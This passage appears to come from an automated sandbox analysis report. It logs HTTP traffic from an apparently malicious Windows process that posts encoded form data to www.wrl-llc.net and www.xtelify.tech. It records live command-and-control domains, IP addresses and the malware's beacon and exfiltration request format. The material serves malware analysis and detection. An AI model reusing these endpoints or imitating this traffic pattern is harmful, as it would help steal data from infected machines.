                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 31 73 67 4d 73 64 39 64 52 57 74 38 44 39 2b 59 65 68 66 49 65 74 6e 6a 30 42 4b 38 6c 5a 69 41 47 45 6f 78 4b 39 44 77 6b 75 4a 42 30 39 73 73 6e 4f 4b 57 4f 4d 64 47 73 4d 54 6c 43 62 44 53 4c 53 37 33 5a 62 55 34 6c 34 6b 72 30 44 4e 4b 48 38 5a 55 74 2f 70 68 6d 41 47 67 79 30 4e 42 53 4a 38 4e 6c 4b 4a 72 77 49 45 65 45 42 41 31 6e 42 76 66 34 51 5a 55 62 34 67 53 50 46 2b 49 6d 53 6a 59 70 62 50 39 76 45 6c 4c 6f 4d 58 31 45 58 6b 76 36 58 54 68 36 6a 55 62 36 63 46 2b 38 54 6e 76 43 45 78 42 6d 6e 2b 53 37 31 76 6d 57 38 36 65 42 68 62 54 42 54 51 6e 59 48 54 78 45 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=1sgMsd9dRWt8D9+YehfIetnj0BK8lZiAGEoxK9DwkuJB09ssnOKWOMdGsMTlCbDSLS73ZbU4l4kr0DNKH8ZUt/phmAGgy0NBSJ8NlKJrwIEeEBA1nBvf4QZUb4gSPF+ImSjYpbP9vElLoMX1EXkv6XTh6jUb6cF+8TnvCExBmn+S71vmW86eBhbTBTQnYHTxEg==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        30192.168.11.20498223.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.562755108 CEST822OUTPOST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 31 73 67 4d 73 64 39 64 52 57 74 38 43 63 4f 59 53 69 33 49 50 4e 6e 67 70 78 4b 38 75 35 69 45 47 45 6b 78 4b 34 6e 67 6a 64 74 42 30 63 38 73 6d 50 4b 57 4c 4d 64 47 6a 73 54 67 64 4c 43 63 4c 56 7a 56 5a 66 63 34 6c 34 67 72 30 43 39 4b 48 74 5a 58 74 76 70 6e 76 67 47 69 2f 55 4e 42 53 4a 38 4e 6c 4b 4e 52 77 49 4d 65 45 78 77 31 6d 6c 37 59 6b 67 5a 58 4d 49 67 53 4c 46 2b 4d 6d 53 6a 32 70 5a 71 71 76 42 35 4c 6f 4e 6e 31 42 56 4d 73 77 58 54 6e 33 44 56 4e 39 64 55 53 31 33 4c 5a 42 6b 46 50 76 47 75 2b 33 44 69 38 4c 4f 4f 36 43 79 48 68 46 6a 70 50 61 46 53 71 5a 74 54 42 4e 58 77 48 4a 57 6e 32 45 65 7a 32 37 54 50 79 48 71 4d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=1sgMsd9dRWt8CcOYSi3IPNngpxK8u5iEGEkxK4ngjdtB0c8smPKWLMdGjsTgdLCcLVzVZfc4l4gr0C9KHtZXtvpnvgGi/UNBSJ8NlKNRwIMeExw1ml7YkgZXMIgSLF+MmSj2pZqqvB5LoNn1BVMswXTn3DVN9dUS13LZBkFPvGu+3Di8LOO6CyHhFjpPaFSqZtTBNXwHJWn2Eez27TPyHqM=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        31192.168.11.20498233.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203603983 CEST2578OUTPOST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 31 73 67 4d 73 64 39 64 52 57 74 38 43 63 4f 59 53 69 33 49 50 4e 6e 67 70 78 4b 38 75 35 69 45 47 45 6b 78 4b 34 6e 67 6a 64 6c 42 30 73 67 73 6e 73 69 57 4d 4d 64 47 71 4d 54 68 64 4c 43 52 4c 54 62 52 5a 66 59 6f 6c 36 49 72 75 67 46 4b 53 76 78 58 2b 50 70 6e 74 67 47 6e 79 30 4e 51 53 49 51 4a 6c 4b 64 52 77 49 4d 65 45 79 6f 31 67 78 76 59 33 77 5a 55 62 34 67 47 50 46 2b 30 6d 53 4c 41 70 5a 75 36 75 31 31 4c 76 74 33 31 47 78 73 73 71 58 54 6c 79 44 56 46 39 64 59 4e 31 7a 54 37 42 6b 77 53 76 45 4f 2b 6d 6e 7a 51 4f 66 75 58 62 45 2b 32 47 77 45 32 61 33 61 4f 47 2f 4c 6c 45 47 55 4c 4e 51 37 2f 47 2f 6e 42 6f 54 2f 6a 62 76 52 61 42 73 48 35 63 64 65 36 65 36 77 2f 49 47 62 4a 59 77 57 50 63 6b 62 7a 59 49 4c 6f 5a 6f 66 48 54 4b 53 6c 4e 61 31 49 38 59 39 46 6e 4a 74 6b 71 67 2f 2b 50 67 2f 6f 7a 65 37 2f 46 44 36 54 5a 5a 70 48 6c 48 5a 67 30 6a 4c 38 64 70 77 76 73 6d 58 4c 57 75 6c 75 76 30 50 4d 6a 63 76 51 69 31 4d 6e 59 4b 4c 53 38 58 77 37 6c 48 44 35 63 46 77 2f [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=1sgMsd9dRWt8CcOYSi3IPNngpxK8u5iEGEkxK4ngjdlB0sgsnsiWMMdGqMThdLCRLTbRZfYol6IrugFKSvxX+PpntgGny0NQSIQJlKdRwIMeEyo1gxvY3wZUb4gGPF+0mSLApZu6u11Lvt31GxssqXTlyDVF9dYN1zT7BkwSvEO+mnzQOfuXbE+2GwE2a3aOG/LlEGULNQ7/G/nBoT/jbvRaBsH5cde6e6w/IGbJYwWPckbzYILoZofHTKSlNa1I8Y9FnJtkqg/+Pg/oze7/FD6TZZpHlHZg0jL8dpwvsmXLWuluv0PMjcvQi1MnYKLS8Xw7lHD5cFw/qvJHnKkP4BpAe8/0ZtLtmjwjkfjqWuIhva16MIvjUJ8BJjhCdIlZUDJFKXU4N5gnk7R0vvO0w3AO+p0Z/MKukCpRi8kWI7LB0/fkRYIlbzG4te2QyKmDXkIaOk/VhylLoTQK3F/tXx54Iewr/1vRCALtWLr+si9NVPe7wJNlVik+rgZY8IwQ3v+Xyk3zzUnCvMxCkygdLqd/Ur89ZCeQ0uaxVq9LebVGpm5FhE0SiTsnZxwT+dB9AO0siRfBADa/4bw3L9rPYw7XplzT3TXFVm8XUoTDt5QUl/zkVkSKwdUmLuHZeiI4lgDlm7C4Z5L/mg6yp50PZOLWr5Rbc5O9+WnO5sZPxmIKV0WYU14LoIv4qtzuVJZMf7fWiS8x9qKngz/7zVjQRZzRgXggt7MfS6Q0eNKG0wxM12QeRQvJiuQqeW/bry4iVsLokneXvp8LdpyGc4ENEGF/pwZfxUZZD++j4bIJFudpi2xreTJ5k4hgYEzLIQKcbKorHQUVF2D7QrDXkBpfHJQYPTdFxscL9Rd0SE1QmeHV1OT58q0T6pNdH192NvR+3Ei/2qOj9Tu3mp9GuvSYjxbpNU1YPRqXsAZA85pnA/uvwyBUsswzrD2WjEfo12lvB9IqykYQSVGkGihDWVfkgjI8d/i7JBnnoFZFZPtvDe8MU2 [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203632116 CEST5156OUTData Raw: 35 2b 39 78 39 4a 72 4b 49 4f 51 44 55 42 4f 55 45 6a 4e 64 65 7a 35 71 71 6c 6c 38 72 4b 71 5a 77 42 45 64 46 50 54 33 37 53 6a 6e 2b 38 31 36 6f 4c 4d 6f 4c 50 73 77 6f 2f 56 6f 41 6e 39 6a 58 32 51 79 42 54 71 36 48 49 32 48 6e 75 73 57 63 62
                                                                                                                                                                                                                        Data Ascii: 5+9x9JrKIOQDUBOUEjNdez5qqll8rKqZwBEdFPT37Sjn+816oLMoLPswo/VoAn9jX2QyBTq6HI2HnusWcbLL7FdNL/Sncdu7maMPv9ZevDwggcbgPfGnpWzspF8DECEteqBNBsLETmwsscZg+GllRRJYW8/Kd1xitNO8oKTokGPDCfaCUxzzCnvm4WjhPEnClWCOHn/jxvG+iPAWMFkMZgArzUMYRmZsoQy22I92/8sSxjmBo8v
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203701019 CEST237OUTData Raw: 77 73 74 68 63 6b 4f 2b 64 71 79 34 50 6e 53 4c 4a 6c 6c 50 6b 2b 37 58 37 4a 75 54 44 35 56 33 6a 65 31 77 4b 2f 42 4e 59 56 76 68 4d 38 6c 36 30 66 77 76 57 61 45 2f 42 6f 34 79 57 31 32 55 49 69 7a 6c 58 5a 41 59 74 78 38 66 78 54 6f 74 6c 54
                                                                                                                                                                                                                        Data Ascii: wsthckO+dqy4PnSLJllPk+7X7JuTD5V3je1wK/BNYVvhM8l60fwvWaE/Bo4yW12UIizlXZAYtx8fxTotlTCM6MEaTcVJUvqR7WWOwscMUsQ+rrfLCWsRwmdABDvzZz9almfJ/1L7xfA+FHlmgZrFxfnUvPOyLZlMOaVSWoY8LBCvOfwtChKm6oukO3aTBaF29g690K6Z3sL72aIKPwJadEXi2KdC7V8zP5xXao2lPHw==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        32192.168.11.20498243.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.885266066 CEST533OUTGET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:55:39.987567902 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:39 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 68 3d 67 36 42 6c 4f 26 32 72 75 6c 2d 3d 34 75 49 73 76 70 4d 79 61 69 4e 61 45 4d 79 6e 53 57 72 61 4a 2f 32 65 77 52 6e 65 79 59 32 49 4d 33 78 6f 45 73 7a 43 69 65 70 4f 2b 76 51 77 74 4d 7a 42 4c 71 34 42 76 4d 44 33 45 4e 65 7a 41 30 37 71 63 61 63 6e 6d 70 49 2f 67 54 38 4b 51 2b 39 39 68 70 35 46 34 69 58 5a 37 6d 6f 6c 4d 38 34 76 71 5a 68 77 36 38 39 61 61 52 5a 79 6e 6e 58 51 69 46 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE="}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        33192.168.11.204982584.32.84.32805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:45.452406883 CEST805OUTPOST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 75 49 6a 45 39 74 66 4a 51 72 6b 70 61 72 52 54 6c 5a 75 72 4b 51 71 66 46 34 38 4e 4d 5a 66 59 4a 71 4f 42 62 33 67 5a 43 71 68 6b 47 31 46 71 34 62 61 6c 5a 67 6e 46 6f 30 59 68 75 72 45 62 59 65 53 4f 67 59 4e 74 46 35 33 72 79 53 2f 36 31 6c 4e 78 71 57 72 6f 4d 59 32 69 49 78 51 42 38 4b 68 34 71 30 41 52 46 2b 4c 46 73 69 79 58 57 48 66 4a 4b 4b 33 7a 61 70 66 2b 58 2f 59 31 39 43 63 37 4d 68 6a 47 74 6e 31 2b 6e 6e 4b 64 6f 33 75 43 5a 36 4e 39 6e 5a 75 45 65 2f 61 75 4f 68 36 50 70 6e 34 7a 77 55 4b 36 7a 30 2f 58 4d 2f 42 6c 71 52 6c 49 37 2b 43 6b 54 66 4f 63 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=UuIjE9tfJQrkparRTlZurKQqfF48NMZfYJqOBb3gZCqhkG1Fq4balZgnFo0YhurEbYeSOgYNtF53ryS/61lNxqWroMY2iIxQB8Kh4q0ARF+LFsiyXWHfJKK3zapf+X/Y19Cc7MhjGtn1+nnKdo3uCZ6N9nZuEe/auOh6Ppn4zwUK6z0/XM/BlqRlI7+CkTfOcA==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        34192.168.11.204982684.32.84.32805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:48.301084042 CEST825OUTPOST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 75 49 6a 45 39 74 66 4a 51 72 6b 6f 35 7a 52 52 43 4e 75 6a 4b 51 70 51 6c 34 38 48 73 59 59 59 4a 6d 4f 42 61 7a 77 5a 77 65 68 6c 6e 46 46 72 36 2f 61 69 5a 67 6e 64 34 30 52 38 2b 72 78 62 59 61 73 4f 67 55 4e 74 46 46 33 72 7a 69 2f 37 43 78 4f 78 36 57 70 6b 73 59 6f 6d 49 78 51 42 38 4b 68 34 71 68 6c 52 46 6d 4c 47 66 36 79 46 6e 48 63 57 36 4b 6f 37 36 70 66 76 48 2f 63 31 39 43 79 37 4f 56 64 47 72 72 31 2b 6e 33 4b 64 35 33 76 4d 5a 36 50 35 6e 59 4b 4d 4e 47 4f 71 4b 52 52 45 4c 2f 43 38 6c 6f 75 2f 6c 35 6c 4b 2b 4c 6c 6d 35 4e 58 4d 4c 48 71 6d 52 65 56 42 46 2b 76 65 33 51 30 39 5a 4f 36 2b 34 35 78 35 55 68 42 58 42 67 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=UuIjE9tfJQrko5zRRCNujKQpQl48HsYYYJmOBazwZwehlnFFr6/aiZgnd40R8+rxbYasOgUNtFF3rzi/7CxOx6WpksYomIxQB8Kh4qhlRFmLGf6yFnHcW6Ko76pfvH/c19Cy7OVdGrr1+n3Kd53vMZ6P5nYKMNGOqKRREL/C8lou/l5lK+Llm5NXMLHqmReVBF+ve3Q09ZO6+45x5UhBXBg=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        35192.168.11.204982784.32.84.32805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146141052 CEST2578OUTPOST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 55 75 49 6a 45 39 74 66 4a 51 72 6b 6f 35 7a 52 52 43 4e 75 6a 4b 51 70 51 6c 34 38 48 73 59 59 59 4a 6d 4f 42 61 7a 77 5a 77 47 68 6c 56 39 46 71 62 2f 61 6a 5a 67 6e 44 6f 30 63 38 2b 72 57 62 63 32 6f 4f 67 70 36 74 44 4a 33 6f 52 71 2f 38 32 64 4f 37 36 57 70 73 4d 59 70 69 49 78 5a 42 34 76 6f 34 71 78 6c 52 46 6d 4c 47 59 43 79 48 32 48 63 55 36 4b 33 7a 61 70 44 2b 58 2f 30 31 38 71 45 37 4f 51 6d 47 62 4c 31 35 44 72 4b 51 72 66 76 41 5a 36 4a 2b 6e 59 53 4d 4d 36 34 71 4d 31 64 45 4b 4c 6b 38 6a 4d 75 2f 42 30 75 50 4e 76 55 33 4c 64 50 4e 4a 54 78 6c 69 7a 4c 49 47 47 54 64 57 4d 6a 36 38 2b 2b 2f 72 59 77 73 33 67 47 56 48 74 77 66 6c 6f 61 72 4c 63 73 36 6d 69 6d 64 2b 47 4c 38 4a 31 61 57 49 41 50 61 31 31 74 56 75 5a 67 54 67 44 42 65 76 75 37 61 56 67 6a 65 53 31 58 6f 57 44 4e 34 45 66 77 53 51 5a 35 72 54 48 39 53 41 4f 54 66 46 68 6d 57 76 46 78 42 42 4b 59 62 76 51 36 33 35 47 4f 6c 51 39 44 67 6d 43 67 77 59 58 79 77 48 74 37 48 2b 43 59 74 2f 37 59 71 67 6d 4a [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=UuIjE9tfJQrko5zRRCNujKQpQl48HsYYYJmOBazwZwGhlV9Fqb/ajZgnDo0c8+rWbc2oOgp6tDJ3oRq/82dO76WpsMYpiIxZB4vo4qxlRFmLGYCyH2HcU6K3zapD+X/018qE7OQmGbL15DrKQrfvAZ6J+nYSMM64qM1dEKLk8jMu/B0uPNvU3LdPNJTxlizLIGGTdWMj68++/rYws3gGVHtwfloarLcs6mimd+GL8J1aWIAPa11tVuZgTgDBevu7aVgjeS1XoWDN4EfwSQZ5rTH9SAOTfFhmWvFxBBKYbvQ635GOlQ9DgmCgwYXywHt7H+CYt/7YqgmJvhC32DXxJsT9QkIMTUEm+hv9GIZX7nRvro45KygYa2amLtvyO2v1DiDf17p+zIxzJp2JXQ2e+L4uYigUwtLXOHvfWoFI9A+v+LULf4R4DkVDtZHUXNN6THs/aZJY7RCWwhuubHAPSQnSXButcHcmzpjARv6rHixQwAC7WFjXqOX3aEZ6D2X5ldzUo2qt8JC6Rub9IzT0m5Yeuy7gUNxeBdkh18ib1iIyT3tMfNk+ZdBLuJ6so5tbTzs+Dq0SmNOsGuECkXUGZxiB2Q9wrwiIv0h0UfueG4WdbEGY1vBVTjxr0jfWYAZY2Tl8Jp5xcaCAPs3CEfG4xF8EcpFs34bAHA1qEt4H9PuAfxjfJEFWY1pNAY14z2dyvAUlBoe/vGPN8Sf+uuXCGuNrewECcxp/r21XosL1mjRSqu/+JuIj/ZgLui9tV/JEK4NE/A06y1Kcj+ZTwrZXq2pn57jb7X4gItnz+9sO4jIUgKsY0BiAsirKrtXc8+G/PiLYpRthasyYw4tfALwWzlw1QyZYF3C5ACS8W3yLNlQDihJ8XTw3DyhjyLERt8hfyJu8hmqghdEDh1Ma7iNETIQQYNr4Sl7P/3MuDROJHA8fmgI/RXc9jClcfCL0lCUjNLYRGkzVI289ExPomM5DgCsP6G+BJbHTd1sOAzoU5cKQpW [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146189928 CEST5156OUTData Raw: 54 62 42 44 56 76 46 46 65 2b 33 79 59 75 56 67 69 70 61 66 45 4e 50 32 72 45 34 45 4c 62 6f 31 53 50 47 49 46 6f 2f 4f 69 2b 54 4b 61 36 4a 4c 61 37 43 51 57 6e 39 2f 63 6c 74 46 76 52 65 71 45 73 44 6f 69 48 2f 2f 5a 6a 79 47 32 42 57 57 4e 75
                                                                                                                                                                                                                        Data Ascii: TbBDVvFFe+3yYuVgipafENP2rE4ELbo1SPGIFo/Oi+TKa6JLa7CQWn9/cltFvReqEsDoiH//ZjyG2BWWNuMzgeSIy4MXpzBa723i57fFGlq36Ku4zA5jZ/68YTWBWP8THxJ5jYQnVKvjICZE+pVEBnKQOUQu1leqNlJOyuMNJRsg4B6s1S35Wtzzj+VM2DqOcKb7HWxnV84m5DmnryGb9TBFdthvuur9dI1TnKG53vpJ0p3YRrL
                                                                                                                                                                                                                        Oct 23, 2024 18:55:51.146236897 CEST240OUTData Raw: 53 66 2b 51 6a 38 42 66 74 33 69 45 46 6b 58 51 75 34 74 71 35 38 68 6d 5a 68 4c 41 52 70 5a 77 34 44 33 6e 54 31 4d 57 55 64 37 34 2f 70 4b 67 2b 6f 52 36 65 32 76 6a 39 69 48 4b 63 6d 35 46 41 2f 4b 5a 73 66 33 4d 2f 30 47 37 57 72 78 74 61 4a
                                                                                                                                                                                                                        Data Ascii: Sf+Qj8Bft3iEFkXQu4tq58hmZhLARpZw4D3nT1MWUd74/pKg+oR6e2vj9iHKcm5FA/KZsf3M/0G7WrxtaJ8/nzoYOGupss7h5Us+iELB2zPw7tggbh0TdIWvl3rFWcb7B+w4nTVDhMuiEUUbGuNV3XDsJtlfHrUgAAQqx2J5cQWNzWAxLdvFukefPZZIo5HQLEmhikH/JOTs+PHx2p1m1dSTeJqK9oEIEHylhE7kvDwHhg==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        36192.168.11.204982884.32.84.32805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:53.986085892 CEST534OUTGET /yzuf/?2rul-=ZsgDHK4yKF/kga3ubUsB++F7bk5VbtpSdK+jBdrvfSumqltPqrTYlvpJAqwvk8XGFPq2CREtnxkO8zvg3UxP0eeY1d9UqJAwYt3G0ZBcRQKWReWSPWriOKM=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:55:54.297432899 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: hcdn
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 10072
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        x-hcdn-request-id: bbfa37000c4d5fd9c0a80ca9062baaca-jnb-edge2
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 16:55:41 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Accept-Ranges: bytes
